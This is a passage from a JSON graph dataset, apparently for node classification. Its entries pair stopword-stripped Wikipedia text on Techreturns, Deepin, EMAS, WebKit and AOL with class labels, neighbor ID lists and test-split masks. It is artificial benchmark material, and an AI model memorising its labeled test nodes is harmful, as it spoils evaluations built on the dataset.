    "text": "Techreturns:techreturns techreturns nederland bv dutch company founded aim reduce electronic waste e-waste buying used electronics especially mobile phones consumers companies repair give second life choose donate mobile phone organisations masterpeace artis zoo company revenues comes selling second hand devices mainly asia africa market affordable quality electronics sales also take place europe especially netherlands sister company beatsnew techreturns connected closing loop foundation collecting e-waste developing countries recycling involved project also organisations fairphone text change recently techreturns appeared multiple times dutch media instance discussion sustainability initiatives dutch government annual summary dutch sustainable businesses 2013 mvo netherlands consumer television programme kassa 14-01-14 segment reuse versus recycling electronic industry techreturns founded 2009 based amsterdam netherlands part social enterprise nederland additionally techreturns department genova italy",
    "neighbors": [
      7579
    ],
    "mask": "Test"
  },
  {
    "node_id": 485,
    "label": 3,
    "text": "Deepin:deepin deepin stylized deepin formerly known linux deepin hiweed linux open source operating system based debian stable branch features dde deepin desktop environment built qt version 15.10 also uses dde-kwin copy kde plasma window manager distribution praised aesthetics various reviews past also criticized using statistical tracking service app store removed since development deepin led china-based wuhan deepin technology co. ltd. generates revenue sale technical support services related distribution ships many open-source proprietary programs google chrome spotify steam also includes software suite applications developed deepin technology well wps office codeweavers crossover deepin comes installer named “ deepin installer ” created deepin technology installer praised swapnil bhartiya writing linux.com simplest installation procedure also quite pleasant writing forbes jason evangelho complained installer requiring user select location world map though concluded saying aside little time zone selection pet peeve installer beautiful brisk intuitive deepin features desktop environment called deepin de dde written qt distribution also maintains window manager dde-kwin desktop environment described single beautiful desktop market jack wallen writing techrepublic besides deepin linux distributions arch linux started include deepin desktop environment package repositories manjaro linux community-supported version comes deepin desktop environment desktop environment also available software repositories fedora 30 deepin comes number applications built via dtk deepin tool kit based c++ qt following list deepin applications created deepin development team release cycle followed various schedules currently aims four releases per year releases delayed work development testing completed distribution begun 2004 hiweed linux 2011 development team behind deepin established company named wuhan deepin technology support commercial development operating system company received business investments year founded wuhan deepin technology joined linux foundation 2015 general reception distribution generally praised aesthetics users reviewers alike linux.com fossbytes techrepublic deepin accused 2018 containing spyware use statistics software within app store company made official statement clarifying would collect private user information according deepin cnzz website similar google analytics collects user-anonymous usage information screen size browser harmless browser user agent information stating cnzz analyzed deepin store used order improve july 20 2018 deepin removed cnzz statistics collection deepin app store website due backlash deepin reputation past relatively high cpu memory demands based mainly gtk html technologies even system idle switching qt-based de performance improved linux.com noted review deepin 15.7",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      9851,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      2786,
      3815,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      5524,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      4011,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 486,
    "label": 2,
    "text": "Edinburgh_Multiple_Access_System:edinburgh multiple access system edinburgh multi-access system emas mainframe computer operating system developed university edinburgh 1970s emas powerful efficient general purpose multi-user system coped many computing needs university edinburgh university kent site outside edinburgh adopt operating system originally running icl system 4/75 mainframe based design ibm 360 later reimplemented icl 2900 series mainframes emas 2900 emas-2 ran service mid-1980s near end life refactored version back-ported emas-3 amdahl 470 mainframe clone thence ibm system/370-xa architecture latter help university kent although never actually ran emas-3 national advanced system nas vl80 ibm mainframe clone followed later final emas system edinburgh vl80 decommissioned july 1992 university kent system went live december 1979 ran least powerful machine icl 2900 range icl 2960 2mb memory executing 290k instructions per second despite reliably supported around 30 users number increased 1983 addition additional 2mb memory second order code processor ocp normally known cpu running symmetric multiprocessing system decommissioned august 1986 emas written entirely edinburgh imp programming language small number critical functions using embedded assembler within imp sources several features advanced time including dynamic linking multi-level storage efficient scheduler separate user-space kernel 'director user-level shell 'basic command interpreter comprehensive archiving system memory-mapped file architecture features led emas supporters claim system superior unix first 20 years latter existence edinburgh computer history project attempting salvage lessons learned emas project complete source code emas online public browsing",
    "neighbors": [
      8262,
      7983,
      7728,
      5492,
      1045,
      7325,
      2399
    ],
    "mask": "Test"
  },
  {
    "node_id": 487,
    "label": 8,
    "text": "WebKit:webkit webkit browser engine used apple safari browser products webkit also basis experimental browser included amazon kindle e-book reader default browser apple ios blackberry browser os 6 tizen mobile operating systems webkit c++ application programming interface api provides set classes display web content windows implements browser features following links clicked user managing back-forward list managing history pages recently visited webkit html javascript code originally fork khtml kjs libraries kde developed people kde apple google nokia bitstream blackberry igalia others macos windows linux unix-like operating systems supported project april 3 2013 google announced forked webcore component webkit used future versions google chrome opera web browser name blink webkit available bsd-form license exception webcore javascriptcore components available gnu lesser general public license march 7 2013 webkit trademark apple registered u.s. patent trademark office code would become webkit began 1998 kde html khtml layout engine kde javascript kjs engine webkit project started within apple melton june 25 2001 fork khtml kjs melton explained e-mail kde developers khtml kjs allowed easier development available technologies virtue small fewer 140,000 lines code cleanly designed standards-compliant khtml kjs ported os x help adapter library renamed webcore javascriptcore javascriptcore announced e-mail kde mailing list june 2002 alongside first release apple changes webcore announced macworld expo january 2003 apple ceo steve jobs release safari web browser javascriptcore first included mac os x v10.2 private framework apple used sherlock application webcore debuted first beta safari mac os x v10.3 first major release apple operating system bundle webkit although already bundled minor release 10.2 according apple changes involved os x-specific features e.g. objective-c kwq os x calls absent kde khtml called different development tactics exchange code webcore khtml became increasingly difficult code base diverged projects different approaches coding code sharing one point khtml developers said unlikely accept apple changes claimed relationship two groups bitter failure apple submitted changes large patches containing many changes inadequate documentation often future additions thus patches difficult kde developers integrate back khtml also apple demanded developers sign non-disclosure agreements looking apple source code even unable access apple bug database publicized divorce period kde developer kurt pfeifle pipitas posted article claiming khtml developers managed backport many safari improvements webcore khtml always appreciated improvements coming apple still article also noted apple begun contact khtml developers discussing improve mutual relationship ways future cooperation fact kde project able incorporate changes improve khtml rendering speed add features including compliance acid2 rendering test following story fork appearance news apple released changes source code webkit fork public revision-control repository since transfer source code public concurrent versions system cvs repository apple khtml developers increasing collaboration many khtml developers become reviewers submitters webkit revision control repository webkit team also reversed many apple-specific changes original webkit code base implemented platform-specific abstraction layers make committing core rendering code platforms significantly easier july 2007 ars technica reported kde team would move khtml webkit instead several years integration kde development platform version 4.5.0 released august 2010 support webkit khtml development khtml continues june 7 2005 safari developer dave hyatt announced weblog apple open-sourcing webkit formerly webcore javascriptcore open source opening access webkit revision control tree issue tracker announced apple worldwide developers conference 2005 apple senior vice president software engineering bertrand serlet mid-december 2005 support scalable vector graphics svg merged standard build early january 2006 source code migrated concurrent versions system cvs subversion svn webkit javascriptcore webcore components available gnu lesser general public license rest webkit available bsd-style license beginning early 2007 development team began implement cascading style sheets css extensions including animation transitions 2d 3d transforms extensions released working drafts world wide web consortium w3c 2009 standardization november 2007 project announced added support media features html5 draft specification allowing embedded video natively rendered script-controlled webkit june 2 2008 webkit project announced rewrote javascriptcore squirrelfish bytecode interpreter project evolved squirrelfish extreme abbreviated sfx announced september 18 2008 compiles javascript native machine code eliminating need bytecode interpreter thus speeding javascript execution initially supported processor architecture sfx x86 end january 2009 sfx enabled os x x86-64 passes tests platform april 8 2010 project named webkit2 announced redesign webkit goal abstract components provide web rendering cleanly surrounding interface application shell creating situation web content javascript html layout etc lives separate process application ui abstraction intended make reuse straightforward process webkit2 webkit webkit2 incompatible api change original webkit motivated name change webkit2 targets set linux mac windows gtk+ meego-harmattan safari os x switched new api version 5.1 safari ios switched webkit2 since ios 8 original webkit api renamed webkitlegacy api webkit2 api renamed plain webkit api webkit used rendering engine within safari formerly used google chrome web browser windows macos ios android version 4.4 kitkat chrome used webcore included javascript engine named v8 multiprocess system applications macos make use webkit apple e-mail client mail 2008 version microsoft entourage personal information manager make use webkit render e-mail messages html content new web browsers built around webkit s60 browser symbian mobile phones blackberry browser ver 6.0+ midori chrome browser android web browser version 4.4 kitkat browser used playstation 3 system software version 4.10 kde rekonq web browser plasma workspaces also use native web rendering engine webkit adopted rendering engine omniweb icab web formerly named epiphany sleipnir replacing original rendering engines gnome web supported gecko webkit time team decided gecko release cycle future development plans would make cumbersome continue supporting webos uses webkit basis application runtime latest interface update valve steam employs webkit render interface built-in browser webkit used render html run javascript adobe integrated runtime application platform adobe creative suite cs5 webkit used render parts user interface first half 2010 analyst estimated cumulative number mobile handsets shipped webkit-based browser 350 million mid april 2015 webkit browser market share 50.3 week hyatt announced webkit open-sourcing nokia announced ported webkit symbian operating system developing browser based webkit mobile phones running s60 named web browser s60 used nokia samsung lg symbian s60 mobile phones apple also ported webkit ios run iphone ipod touch ipad used render content device web browser e-mail software android mobile phone platform used webkit later versions blink fork basis web browser palm pre announced january 2009 interface based webkit amazon kindle 3 includes experimental webkit based browser june 2007 apple announced webkit ported microsoft windows part safari webkit also ported several toolkits support multiple platforms gtk toolkit linux using gnome web adobe integrated runtime enlightenment foundation libraries efl clutter toolkit qt software included webkit port qt 4.4 release module called qtwebkit since superseded qtwebengine uses blink instead iris browser qt also used webkit enlightenment foundation libraries efl port – ewebkit – developed samsung profusion focusing embedded mobile systems use stand alone browser widgets-gadgets rich text viewer composer clutter port developed collabora sponsored robert bosch gmbh also project synchronized webkit sponsored pleyo called origyn web browser provided meta-port abstract platform aim making porting embedded lightweight systems quicker easier port used embedded devices set-top boxes pmp ported amigaos aros morphos morphos version 1.7 first version origyn web browser owb supporting html5 media tags april 3 2013 google announced would produce fork webkit webcore component named blink chrome developers decided fork allow greater freedom implementing webcore features browser without causing conflicts upstream allow simplifying codebase removing code webcore components unused chrome relation opera software announcement earlier year would switch webkit means chromium codebase confirmed opera web browser would also switch blink following announcement webkit developers began discussions removing chrome-specific code engine streamline codebase webkit longer chrome specific code e.g. buildsystem v8 javascript engine hooks platform code etc webcore layout rendering document object model dom library html scalable vector graphics svg developed webkit project full source code licensed gnu lesser general public license lgpl webkit framework wraps webcore javascriptcore providing objective-c application programming interface c++-based webcore rendering engine javascriptcore script engine allowing easily referenced applications based cocoa api later versions also include cross-platform c++ platform abstraction various ports provide apis webkit passes acid2 acid3 tests pixel-perfect rendering timing smoothness issues reference hardware javascriptcore framework provides javascript engine webkit implementations provides type scripting contexts within macos javascriptcore originally derived kde javascript engine kjs library part kde project pcre regular expression library since forking kjs pcre javascriptcore improved many new features greatly improved performance june 2 2008 webkit project announced rewrote javascriptcore squirrelfish bytecode interpreter project evolved squirrelfish extreme abbreviated sfx marketed nitro announced september 18 2008 compiles javascript native machine code eliminating need bytecode interpreter thus speeding javascript execution optimizing just-in-time jit compiler named ftl announced may 13 2014 uses llvm generate optimized machine code ftl stands fourth-tier-llvm unofficially faster-than-light alluding speed february 15 2016 backend ftl jit replaced bare bones backend b3 short",
    "neighbors": [
      2072,
      6171,
      6186,
      4139,
      2108,
      8253,
      64,
      4171,
      84,
      4180,
      6231,
      4184,
      8281,
      2139,
      2141,
      2149,
      8303,
      115,
      119,
      6266,
      124,
      2182,
      2207,
      8351,
      2232,
      185,
      4283,
      2258,
      2259,
      4310,
      4318,
      4326,
      231,
      10470,
      2282,
      2285,
      2288,
      8441,
      8443,
      259,
      2308,
      8455,
      10507,
      10512,
      278,
      4378,
      4399,
      2363,
      2365,
      2366,
      10562,
      339,
      10584,
      4457,
      8557,
      10608,
      2420,
      6528,
      2439,
      8584,
      6539,
      8605,
      8609,
      438,
      2492,
      446,
      2502,
      456,
      464,
      8662,
      4571,
      479,
      482,
      10722,
      487,
      488,
      494,
      499,
      502,
      2556,
      513,
      6657,
      10755,
      4615,
      10761,
      2579,
      10791,
      6700,
      559,
      4657,
      8754,
      4661,
      10808,
      8783,
      10834,
      10838,
      603,
      6747,
      4702,
      8806,
      2673,
      6771,
      2676,
      4728,
      637,
      2686,
      6783,
      10878,
      6791,
      10888,
      6797,
      2707,
      8852,
      8854,
      10910,
      684,
      8877,
      2735,
      4797,
      6849,
      713,
      4822,
      2777,
      8923,
      737,
      6884,
      10991,
      2804,
      2819,
      784,
      4888,
      11037,
      811,
      4908,
      11060,
      823,
      4919,
      9022,
      2880,
      4933,
      11082,
      9035,
      2893,
      11087,
      4957,
      9063,
      7052,
      9100,
      9101,
      9109,
      5026,
      2979,
      944,
      5048,
      5054,
      9152,
      3015,
      7118,
      5078,
      9174,
      11223,
      3035,
      7133,
      9182,
      5093,
      9195,
      5101,
      7152,
      7154,
      11257,
      5114,
      7163,
      1042,
      11289,
      1074,
      1077,
      9275,
      7246,
      5219,
      9320,
      9343,
      11402,
      7318,
      3228,
      11430,
      5292,
      7340,
      3248,
      7346,
      9394,
      11449,
      9406,
      5311,
      9418,
      11466,
      11469,
      9424,
      3286,
      9430,
      3289,
      3293,
      7396,
      7399,
      9451,
      5356,
      7420,
      7421,
      7422,
      11521,
      1290,
      5397,
      7455,
      3371,
      9529,
      1346,
      3407,
      3409,
      9560,
      5483,
      1409,
      3462,
      7572,
      3483,
      1439,
      3498,
      7614,
      1482,
      5605,
      5612,
      1520,
      9714,
      5619,
      5622,
      9732,
      9736,
      5647,
      7697,
      7708,
      9757,
      7713,
      9768,
      3626,
      9770,
      3639,
      9784,
      3643,
      9802,
      5707,
      5713,
      3670,
      1623,
      3672,
      3681,
      9826,
      1642,
      9834,
      9841,
      9843,
      1664,
      1668,
      3719,
      1686,
      1699,
      1710,
      3761,
      7857,
      9908,
      3766,
      9912,
      3772,
      7869,
      7871,
      1729,
      7885,
      3790,
      1772,
      7928,
      9987,
      1796,
      7943,
      7951,
      5912,
      7965,
      5921,
      10023,
      1834,
      7983,
      10036,
      7991,
      10057,
      8021,
      1878,
      10080,
      3948,
      10097,
      3971,
      6023,
      1952,
      8109,
      6086,
      6093,
      4048,
      4056,
      4068,
      2023,
      8169,
      10221,
      6133,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 488,
    "label": 8,
    "text": "AOL:aol aol stylized aol. formerly company known aol inc. originally known america online american web portal online service provider based new york city brand marketed verizon media service traces history online service known playnet hosted multi-player games commodore 64 playnet licensed software new service quantum link q-link went online november 1985 playnet shut shortly thereafter initial q-link service similar original playnet time q-link added many new services new ibm pc client released company focussed non-gaming services launched name america online original q-link shut november 1 1995 aol grew become largest online service displacing established players like compuserve source 1995 aol 3 million active users aol one early pioneers internet mid-1990s recognized brand web united states originally provided dial-up service millions americans well providing web portal e-mail instant messaging later web browser following purchase netscape 2001 height popularity purchased media conglomerate time warner largest merger u.s. history aol rapidly declined thereafter partly due decline dial-up rise broadband aol eventually spun time warner 2009 tim armstrong appointed new ceo leadership company invested media brands advertising technologies june 23 2015 aol acquired verizon communications 4.4 billion aol began 1983 short-lived venture called control video corporation cvc founded william von meister sole product online service called gameline atari 2600 video game console von meister idea buying music demand rejected warner bros subscribers bought modem company us 49.95 paid one-time us 15 setup fee gameline permitted subscribers temporarily download games keep track high scores cost us 1 per game telephone disconnected downloaded game would remain gameline master module playable user turned console downloaded another game january 1983 steve case hired marketing consultant control video recommendation brother investment banker dan case may 1983 jim kimsey became manufacturing consultant control video near bankruptcy kimsey brought west point friend frank caufield investor company early 1985 von meister left company may 24 1985 quantum computer services online services company founded jim kimsey remnants control video kimsey chief executive officer marc seriff chief technology officer technical team consisted marc seriff tom ralston ray heinrich steve trus ken huntsman janet hunter dave brown craig dykstra doug coward mike ficco 1987 case promoted executive vice-president kimsey soon began groom case take role ceo kimsey retired 1991 kimsey changed company strategy 1985 launched dedicated online service commodore 64 128 computers originally called quantum link q-link short quantum link software based software licensed playnet inc founded 1983 howard goldberg dave panzl service different online services used computing power commodore 64 apple ii rather dumb terminal passed tokens back forth provided fixed price service tailored home users may 1988 quantum apple launched applelink personal edition apple ii macintosh computers august 1988 quantum launched pc link service ibm-compatible pcs developed joint venture tandy corporation company parted ways apple october 1989 quantum changed service name america online case promoted sold aol online service people unfamiliar computers contrast compuserve well established technical community beginning aol included online games mix products many classic casual games included original playnet software system early years aol company introduced many innovative online interactive titles games including february 1991 aol dos launched using geoworks interface followed year later aol windows coincided growth pay-based online services like prodigy compuserve genie 1991 also saw introduction original dungeons dragons title called neverwinter nights stormfront studios one first multiplayer online role playing games depict adventure graphics instead text early 1990s average subscription lasted 25 months accounted 350 total revenue advertisements invited modem owners try america online free promising free software trial membership aol discontinued q-link pc link late 1994 september 1993 aol added usenet access features commonly referred eternal september usenet cycle new users previously dominated smaller numbers college university freshmen gaining access september taking weeks acclimate also coincided new carpet bombing marketing campaign cmo jan brandt distribute many free trial aol trial disks possible nonconventional distribution partners one point 50 cds produced worldwide aol logo aol quickly surpassed genie mid-1990s passed prodigy several years allowed aol advertising compuserve next several years aol launched services national education association american federation teachers national geographic smithsonian institution library congress pearson scholastic ascd nsba ncte discovery networks turner education services cnn newsroom npr princeton review stanley kaplan barron highlights kids u.s. department education many education providers aol offered first real-time homework help service teacher pager—1990 prior aol provided homework help bulletin boards first service children children kids online 1991 first online service parents parents information network 1991 first online courses 1988 first omnibus service teachers teachers information network 1990 first online exhibit library congress 1991 first parental controls many online education firsts aol purchased search engine webcrawler 1995 next year sold excite deal makes excite exclusive search directory service aol deal closed march 1997 aol launched branded search engine based excite called netfind renamed aol search 1999 aol charged users hourly fee december 1996 company changed flat monthly rate 19.95 time aol connections would flooded users trying get many canceled accounts due constant busy signals commercial featuring steve case telling people aol working day night fix problem made within three years aol user base grew 10 million people 1995 aol headquartered 8619 westwood center drive tysons corner cdp unincorporated fairfax county virginia near town vienna aol quickly running room october 1996 network fairfax county campus mid-1996 aol moved 22000 aol way dulles unincorporated loudoun county virginia provide room future growth five-year landmark agreement popular operating system aol bundled windows software march 31 1996 short-lived eworld purchased aol 1997 half u.s. homes internet access aol time aol content channels jason seiken including news sports entertainment experienced greatest growth aol become dominant online service internationally 34 million subscribers november 1998 aol announced would acquire netscape best known web browser major 4.2 billion deal deal closed march 17 1999 another large acquisition december 1999 mapquest 1.1 billion january 2000 aol time warner announced plans merge forming aol time warner inc terms deal called aol shareholders 55 new combined company deal closed january 11 2001 new company led executives aol sbi time warner gerald levin served ceo time warner ceo new company steve case served chairman j. michael kelly aol chief financial officer robert w. pittman aol dick parsons time warner served co-chief operating officers 2002 jonathan miller became ceo aol following year aol time warner dropped aol name 2004 along launch aol 9.0 optimized aol also made available option personalized greetings would enable user hear name accessing basic functions mail alerts logging 2005 aol broadcast live 8 concert live internet thousands users downloaded clips concert following months late 2005 aol released aol safety security center bundle mcafee antivirus ca anti-spyware proprietary firewall phishing protection software news reports late 2005 identified companies yahoo microsoft google candidates turning aol joint venture plans abandoned revealed december 20 2005 google would purchase 5 share aol 1 billion april 3 2006 aol announced retiring full name america online official name service became aol full name time warner subdivision became aol llc june 8 2006 aol offered new program called aol active security monitor diagnostic tool checked local pc security status recommended additional security software aol download.com program rated computer variety different areas security general computer health two months later aol released aol active virus shield software developed kaspersky lab active virus shield software free require aol account internet email address isp side aol uk bought carphone warehouse october 2006 take advantage 100,000 llu customers making carphone warehouse biggest llu provider uk august 2006 aol announced would give away email accounts software previously available paying customers provided customer accessed aol aol.com non-aol-owned access method otherwise known third party transit bring access byoa move designed reduce costs associated walled garden business model reducing usage aol-owned access points shifting members high-speed internet access client-based usage lucrative advertising provider aol.com change paid free also designed slow rate members canceling accounts defecting microsoft hotmail yahoo free email providers free services included also month aol informed american customers would increasing price dial-up access us 25.90 increase part effort migrate service remaining dial-up users broadband increased price price charging monthly dsl access however aol since started offering services 9.95 month unlimited dial-up access november 16 2006 randy falco succeeded jonathan miller ceo december 2006 aol closed last remaining call center united states taking america america online according industry pundits service centers based india philippines continue day provide customer support technical assistance subscribers september 17 2007 aol announced moving one corporate headquarters dulles virginia new york city combining various advertising units new subsidiary called platform action followed several advertising acquisitions notably advertising.com highlighted company new focus advertising-driven business models aol management stressed significant operations remain dulles included company access services modem banks october 2007 aol announced would move one headquarters loudoun county virginia new york city would continue operate virginia offices part impending move new york restructuring responsibilities dulles headquarters complex reston move aol ceo randy falco announced october 15 2007 plans lay 2,000 employees worldwide end 2007 beginning immediately end result near 40 layoff across board aol compensation packages associated october 2007 layoffs included minimum 120 days severance pay 60 given lieu 60-day advance notice requirement provisions 1988 federal warn act november 2007 aol customer base reduced 10.1 million subscribers narrowly ahead comcast yahoo according falco december 2007 conversion rate accounts paid access free access 80 january 3 2008 aol announced closing one three northern virginia data centers reston technology center sold crg west february 6 time warner ceo jeff bewkes announced time warner would split aol internet access advertising businesses two possibility later selling internet access division march 13 2008 aol purchased social networking site bebo 850m £417m july 25 aol announced shedding xdrive aol pictures bluestring save costs focus core advertising business aol pictures terminated december 31 october 31 aol hometown web hosting service websites aol customers aol journal blog hosting service eliminated march 12 2009 tim armstrong formerly google named chairman ceo aol shortly thereafter may 28 time warner announced would spin aol independent company google shares ceased end fiscal year november 23 aol unveiled sneak preview new brand identity wordmark aol superimposed onto canvases created commissioned artists new identity designed wolff olins enacted onto aol services december 10 date aol traded independently first time since time warner merger new york stock exchange symbol aol april 6 2010 aol announced plans shut sell bebo june 16 property sold criterion capital partners undisclosed amount believed around 10 million december aim eliminated access aol chat rooms noting marked decline patronage recent months armstrong leadership aol began taking steps new business direction marked series acquisitions june 11 2009 aol already announced acquisition patch media network community-specific news information sites focuses individual towns communities september 28 2010 san francisco techcrunch disrupt conference aol signed agreement acquire techcrunch overall strategy providing premier online content december 12 2010 aol acquired about.me personal profile identity platform four days latter public launch january 31 2011 aol announced acquisition european video distribution network goviral february 7 aol bought huffington post 315 million shortly acquisition announced huffington post co-founder arianna huffington replaced aol content chief david eun assuming role president editor-in-chief aol huffington post media group march 10 aol announced would cut around 900 workers wake huffington post deal september 14 2011 aol formed strategic ad selling partnership two largest competitors yahoo microsoft according new partnership three companies would begin selling inventory sites strategy designed help compete google ad networks february 28 2012 aol partnered pbs launch makers digital documentary series focusing high-achieving women male-dominated industries war comedy space business hollywood politics subjects makers episodes included oprah winfrey hillary clinton sheryl sandberg martha stewart indra nooyi lena dunham ellen degeneres march 15 2012 aol announced acquisition hipster mobile photo-sharing app undisclosed amount april 9 2012 aol announced deal sell 800 patents microsoft 1.056 billion deal includes perpetual license aol use patents april aol took several steps expand ability generate revenue online video advertising company announced would offer gross rating point grp guarantee online video mirroring tv ratings system guaranteeing audience delivery online video advertising campaigns bought across properties announcement came days digital content newfront dcnf two-week event held aol google hulu microsoft vevo yahoo showcase participating sites digital video offerings digital content newfront conducted advance traditional television upfronts hopes diverting advertising money digital space april 24 company launched aol network single website video output february 2013 aol reported fourth quarter revenue 599.5 million first growth quarterly revenue 8 years august 2013 armstrong announced patch media would scale back sell hundreds local news sites long afterwards layoffs began 500 1,100 positions initially impacted january 15 2014 patch media spun majority ownership held hale global end 2014 aol controlled 0.74 global advertising market well behind industry leader google 31.4 january 23 2014 aol acquired gravity software startup tracked users ’ online behavior tailored ads content based interests 83 million deal included roughly 40 gravity employees personalization technology ceo tim armstrong fourth largest deal since taking company 2009 later year aol also acquired vidible developed technology help websites run video content publishers help video publishers sell content websites deal announced december 1 2014 reportedly worth roughly 50 million july 16 2014 aol earned emmy nomination aol original series future starts news documentary category came days aol earned first primetime emmy award nomination park bench steve buscemi outstanding short form variety series category later award created hosted tiffany shlain series focused human relationship technology featured episodes future species love robots case optimism may 12 2015 verizon announced plans buy aol 50 per share deal valued 4.4 billion transaction completed june 23 armstrong continued lead firm following regulatory approval called deal logical next step aol look forward five years 're going space going massive global-scale networks better partner us go forward verizon said really selling company today setting next five 10 years analyst david bank said thought deal made sense verizon deal broaden verizon advertising sales platforms increase video production ability websites huffington post techcrunch engadget however craig moffett said unlikely deal would make big difference verizon bottom line aol two million dial-up subscribers time buyout announcement caused aol stock price rise 17 verizon stock price dropped slightly shortly verizon purchase april 14 2015 aol launched one aol digital marketing programmatic platform unifies buying channels audience management platforms track optimize campaigns multiple screens later year september 15 aol expanded product one aol creative geared towards creative media agencies similarly connect marketing ad distribution efforts may 8 2015 aol reported first quarter revenue 625.1 million 483.5 million came advertising related operations marking 7 increase q1 2014 year aol platforms division saw 21 increase revenue drop adjusted oibda due increased investments company video programmatic platforms june 29 2015 aol announced deal microsoft take majority digital advertising business pact many 1,200 microsoft employees involved business transferred aol company take sale display video mobile ads various microsoft platforms nine countries including brazil canada united states united kingdom additionally google search replaced aol properties bing—which display advertising sold microsoft advertising deals subject affiliate marketing revenue sharing july 22 2015 aol received two news documentary emmy nominations one makers outstanding historical programming category true trans laura jane grace documented story laura jane grace transgender musician best known founder lead singer songwriter guitarist punk rock band decision come publicly overall transition experience september 3 2015 aol agreed buy millennial media us 238 million october 23 2015 aol completed acquisition october 1 2015 go90 free ad-supported mobile video service aimed young adult teen viewers verizon owns aol oversees operates launched content publicly months beta testing initial launch line-up included content comedy central huffington post nerdist news univision news vice espn mtv january 25 2016 aol expanded one platform introducing one aol publishers combines six previously separate technologies offer various publisher capabilities customizing video players offering premium ad experience boost visibility generating large video libraries announcement made tandem aol acquisition alephd paris-based startup focused publisher analytics ad price tracking based historical data aol announced alephd would part one aol publishers platform april 20 2016 aol acquired virtual reality studio ryot bring immersive 360 degree video vr content huffington post global audience across desktop mobile apps july 2016 verizon communications announced intent purchase core internet business yahoo verizon tentatively plans merge aol yahoo new company called oath inc. april 2018 oath inc. sold moviefone moviepass parent helios matheson analytics 2019 following media brands became subsidiary aol parent verizon media aol content contributors consists 20,000 bloggers including politicians celebrities academics policy experts contribute wide range topics making news addition mobile-optimized web experiences aol produces mobile applications existing aol properties like autoblog engadget huffington post techcrunch aim mapquest products alto pip vivv aol global portfolio media brands advertising solutions across mobile desktop tv solutions include brand integration sponsorships in-house branded content arm partner studio aol well data programmatic offerings ad technology stack one aol aol acquired number businesses technologies help form one aol acquisitions included adaptv 2013 convertro precision demand vidible 2014 one aol broken one aol publishers formerly vidible aol network publishers one aol advertisers several sub-platforms 10 september 2018 aol parent company oath consolidated yahoo brightroll one aol yahoo gemini ‘ simplify ’ adtech service launching single advertising proposition dubbed oath ad platforms aol offers range integrated products properties including communication tools mobile apps services subscription packages aol desktop internet suite produced aol integrates web browser media player instant messenger client version 10.x based aol openride upgrade macos version based webkit aol desktop version 10.x different previous aol browsers aol desktop versions features focused web browsing well email instance one sign aol order use regular browser addition non-aol email accounts accessed primary buttons include mail im several shortcuts various web pages first two require users sign shortcuts web pages used without authentication aol desktop version 10.x late marked unsupported favor supporting aol desktop 9.x versions version 9.8 released replacing internet explorer components internet browser cef chromium embedded framework give users improved web browsing experience closer chrome version 11 aol desktop currently beta total rewrite maintains similar user interface previous 9.8.x series releases 2017 new paid version called aol desktop gold released available 4.99 per month trial replaced previous free version earlier incarnation walled garden community service provider aol received criticism community policies terms service customer service prior 2006 aol known direct mailing cd-roms 3½ floppy disks containing software disks distributed large numbers one point half cds manufactured worldwide aol logos marketing tactic criticized environmental cost aol cds recognized pc world annoying tech product prior mid-2005 aol used online volunteers called community leaders cls monitor chatrooms message boards libraries aol use remote volunteers dated back establishment quantum link service 1985 content maintenance performed partner internal employees community leaders recruited content design maintenance used proprietary language interface called rainman community leaders hosted chat rooms provided online help time aol customers paid hour chat room hosts compensated free online time hour worked though banked hours became worthless fixed-rate payment introduced two former community leaders brian williams dallas kelly hallissey new york filed class action lawsuit aol citing violations u.s. labor laws use community leaders lawsuit filed united states federal courthouse new york city may 25 1999 followed shortly dismissal community leaders age 18 years well reorganization community leader program whole department labor also investigating aol alleged labor law violations came conclusion closing investigation 2001 aol began drastically reducing responsibilities privileges volunteers 2000 program eventually ended june 8 2005 current community leaders time offered 12 months credit accounts thanks service within one decade class action lawsuit filed class grown 6,000 members comprising largest class action lawsuit ever filed internet based company currently third largest class ever involved lawsuit federal level united states affecting ultimately employment eligibility individuals online environment february 2010 settlement approved courts class action suit settlement included us 15 million payment payment divided thirds first attorney legal fees five million divided among included members class consisted 7,000 individual former community leaders final five million dollars donated charities hand picked hallissey williams approved courts distribution one charity remote area medical foundation www.ramusa.org received payments excess us 1.2 million provision medical services supplies medication need within rural areas united states beyond prior 1999 class action lawsuit community leaders informed change compensation duties performed aol community leaders would charged reduced rate per month accounts would longer given unlimited access without invoice live announcement via online meeting community leaders virtual arena brian williams dallas led many community leaders virtual strike sit-in protest new charges community leaders asked pay protest strike noted first kind online environment nicknamed row arena held row 800 following protest aol terminated online working relationship several community leaders involved quickly following release community leaders reinstated exception williams due role protest time williams role aol guide xnt guide program cb naked crystal ball forum vnv naked ivillage vices virtues forum jcommbrian jewish community online forum aol faced number lawsuits claims slow stop billing customers accounts canceled either company user addition aol changed method calculating used minutes response class action lawsuit previously aol would add 15 seconds time user connected service round next whole minute thus person used service 12 minutes 46 seconds would charged 14 minutes aol claimed account sign on/sign time practice made known customers plaintiffs also pointed signing always take 15 seconds especially connecting via another isp aol disclosed connection-time calculation methods customers credited extra free hours addition aol software would notify user exactly long connected many minutes charged aol sued ohio attorney general october 2003 improper billing practices case settled june 8 2005 aol agreed resolve consumer complaints filed ohio ag office december 2006 aol agreed provide restitution florida consumers settle case filed florida attorney general many customers complained aol personnel ignored demands cancel service stop billing 